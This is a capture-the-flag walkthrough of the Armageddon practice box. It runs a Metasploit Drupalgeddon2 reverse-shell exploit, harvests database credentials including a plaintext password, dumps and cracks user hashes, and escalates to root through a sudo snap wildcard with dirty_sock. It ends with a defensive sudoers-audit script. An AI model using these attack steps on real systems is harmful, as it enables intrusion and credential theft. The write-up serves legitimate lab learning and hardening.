One of the first things I do whenever looking at a new machine is check out the website to see what's on it, so with Armageddon I did the same. I checked the site and found a giant chicken on the main page! I wasn't familiar with the login platform, so I went ahead and ran an nmap scan on the machine next:

80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

Output from the nmap scan told me that it was Drupal 7, which is good news because CMSes tend to be a gold mine for exploitation.
I went ahead and ran Metasploit (msfconsole), did a search for Drupal 7, and sure enough there were a lot of available options. I picked drupal_drupalgeddon2 (drupalgeddon also worked): use unix/webapp/drupal_drupalgeddon2, then set rhost to the attack machine and set lhost to your ifconfig tun0 address. When you don't configure a payload in msfconsole it automatically sets one up for you; in this case it defaulted to php/meterpreter/reverse_tcp. After that, simply type run, and once you're granted a meterpreter, type shell.
Once I had my shell, I went ahead and typed sysinfo and the usual things to get information about where I was and what was hanging around. By doing cd sites/all I was able to stumble across the settings.php file. I wanted to take a look at settings.php because it might tell us some interesting information about the current configuration of the machine, and in this case we find a few credentials, namely the database username and password. Perfect!
From here, I did a cat /etc/passwd to see what accounts were on the machine and noticed brucetherealadmin as the newest account, since it sits at the bottom of the file, so it looked like my target.
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
I also see sql on here, which is good to know since we have database credentials on the machine, but in order to pull information from the database I had to learn a little bit about mysql commands because I'm pretty bad with that sort of thing. I found the following link below and looked around to discover I could just use:

mysql -u drupaluser -p drupal -e 'show databases;'

Database
information_schema
drupal
mysql
performance_schema
Looking for the usernames and passwords of the individuals on the account (the second being an account I "created" on the original website), I pulled the hash for

mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'

then hashcatted the password to reveal
From this point, I had a username and password, so I SSH'd into the machine and ran cat user.txt to pull the user flag.

┌──(moo㉿spacecow)-[~]
└─$ ssh firstname.lastname@example.org
The authenticity of host '10.129.187.69 (10.129.187.69)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.187.69' (ECDSA) to the list of known hosts.
email@example.com's password:
Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2
[brucetherealadmin@armageddon ~]$ cat user.txt
I typically run sudo -l whenever I'm on a new machine, and noticed snap was the method of entry here, so sudo /usr/bin/snap install * had to be used in order to install dirty-sock; then I ran cat /etc/passwd to see if the account was created. After checking the account, I then did su dirty_sock with the same password, then sudo -i to pull root and grab the last flag with
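A defender-side check for the weak spot this box turned on, added here as example code that is not part of the original writeup: it parses sudoers-style rules (the sample text is constructed, modelled on the snap rule that sudo -l exposed) and flags entries that let a non-root user run a package manager, ALL, or a wildcard command as root; the package-manager list is an assumption taken from common hardening checklists.

```python
import re
# Binaries that install or run arbitrary code as root when sudo allows them; snap is the one this
# box relied on, the others are assumptions taken from common hardening checklists.
PACKAGE_MANAGERS = {"snap", "apt", "apt-get", "yum", "dnf", "rpm", "dpkg", "pip", "pip3"}
# Minimal sudoers rule grammar: "who host=(runas_user:runas_group) [TAG:]... cmd1, [TAG:] cmd2"
RULE_RE = re.compile(r"^(?P<who>\S+)\s+[^=\s]+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*")

# Constructed sample, modelled on the single rule sudo -l exposed on this box.
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap install *
ops ALL=(root) /usr/bin/systemctl restart httpd
"""

def parse_rule(line):
    """Return (who, runas_users, [(command, tags)]) or None for blank, comment, Defaults and alias lines."""
    line = line.split("#", 1)[0].strip()
    skip = not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias")
    m = None if skip else RULE_RE.match(line)
    if not m:
        return None
    runas = (m.group("runas") or "root").split(":")[0]   # user half of (user:group); sudo defaults to root
    tags, cmds = set(), []
    for piece in m.group("rest").split(","):             # a tag applies to every command after it
        piece = piece.strip()
        while (t := TAG_RE.match(piece)):
            tags.add(t.group(1))
            piece = piece[t.end():]
        cmds.append((piece.strip(), frozenset(tags)))
    return m.group("who"), {u.strip() for u in runas.split(",")}, cmds

def audit_sudoers(text):
    """Flag rules letting a non-root user run ALL, a package manager, or a wildcard command as root."""
    findings = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if not parsed or parsed[0] == "root" or not (parsed[1] & {"root", "ALL"}):
            continue
        for cmd, tags in parsed[2]:
            reasons = []
            if cmd == "ALL" or cmd.split()[0].rsplit("/", 1)[-1] in PACKAGE_MANAGERS:
                reasons.append("runs ALL or a package manager as root, i.e. arbitrary code")
            if "*" in cmd:
                reasons.append("wildcard lets the caller append extra arguments")
            if reasons and "NOPASSWD" in tags:
                reasons.append("no password required")
            if reasons:
                findings.append({"who": parsed[0], "command": cmd, "reasons": tuple(reasons)})
    return findings
```

Run it over the real /etc/sudoers and /etc/sudoers.d/* on a host; the fix for the flagged rule is to drop the wildcard and the package manager entirely rather than tighten the pattern, since snap install of a local file is enough on its own.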